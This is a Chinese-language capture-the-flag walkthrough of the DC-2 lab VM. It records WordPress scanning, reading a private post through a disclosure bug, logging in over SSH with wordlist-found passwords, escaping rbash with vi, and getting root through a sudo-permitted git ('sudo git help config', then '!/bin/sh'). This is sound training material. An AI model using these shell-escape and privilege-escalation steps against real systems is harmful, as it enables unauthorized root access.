DC-2
1 信息收集
开放了80(web-wordpress)和7744(ssh),系统为linux
{"ip":"192.168.1.109","port":7744,"service":"ssh","Banner":"SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u7\\x0d\\x0a","url":""}
{"ip":"192.168.1.109","port":80,"service":"http","Banner":"","url":"http://192.168.1.109:80"}
{"url":"http://192.168.1.109:80","StatusCode":200,"Title":"DC-2–JustanotherWordPresssite","HeaderDigest":"server:Apache/2.4.10 (Debian)","Length":53562,"KeywordFinger":"WordPress","HashFinger":""}
拿nuclei扫了下wordpress,存在xss(没啥用),ssrf(可能有用),
信息泄露,存在两个用户admin和jerry/ Jerry Mouse
2 从web进行尝试
进wordpress看了下,里面flag1直接给了,说下一个flag需要登录,而且自己的字典可能不够用,需要用到cewl
看了下这个ssrf,是利用rpc的方法来发出请求,但没法利用,找到了wp的版本是4.7.10,貌似已经修复了?
换wpscan扫了一下
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
|
| [!] 40 vulnerabilities identified:
|
......
扫出来挺多漏洞,因为版本比较老了(4年前的老版本,算是降维打击了),看见一个未授权查看私有博文的漏洞,找了几篇文章看了下,拿到了flag2,http://dc-2/?static=1
flag2说wp打不进去就去找另一个入口,指的ssh
前面说了要用cewl生成字典,看了下原理,是把网页中的词扒下来再处理一下
拿一个账号试试看jerry: adipiscing,发现这个上不了ssh,可能密码不对?
换一个账号试试tom: parturient,可以了
3 绕过rbash
rbash,也是restricted shell(受限的shell),属于安全功能,维基百科里竟然还有绕过方法(启动一个有shell特性函数的程序):使用vi,使用bash
可以使用的命令有这几个,那就只能使用vi了
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi
tom@DC-2:~$ vi
:set shell=/bin/sh
:shell
# 虽然不受限了,但PATH仍然没有变
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
# 拿到 flag3
tom@DC-2:~$ /bin/cat flag*
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
# 这句话大致是想说,可以看看jerry?
4 提权
这样操作很麻烦,试了下有权限修改环境变量
tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH # 添加bin的路径
tom@DC-2:~$ export SHELL=/bin/bash:$SHELL # 添加bash的路径
用LinEnum扫了下,没可利用的漏洞,想起来前面那个flag3,之前ssh是没有登录上jerry的账号的,切换一下试试(这一步有点奇怪)
tom@DC-2:~$ su jerry
Password: adipiscing
jerry@DC-2:/home/tom$ cd ~
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!! # 这里提到了git,但摸不着头,看了下wp
看一下当前用户在sudo下有无可用命令,git在内
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
这有一篇sudo提权的文章,用里面的方法提权
sudo git help config
##输入!/bin/sh 并回车执行shell
拿到最后一个flag
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
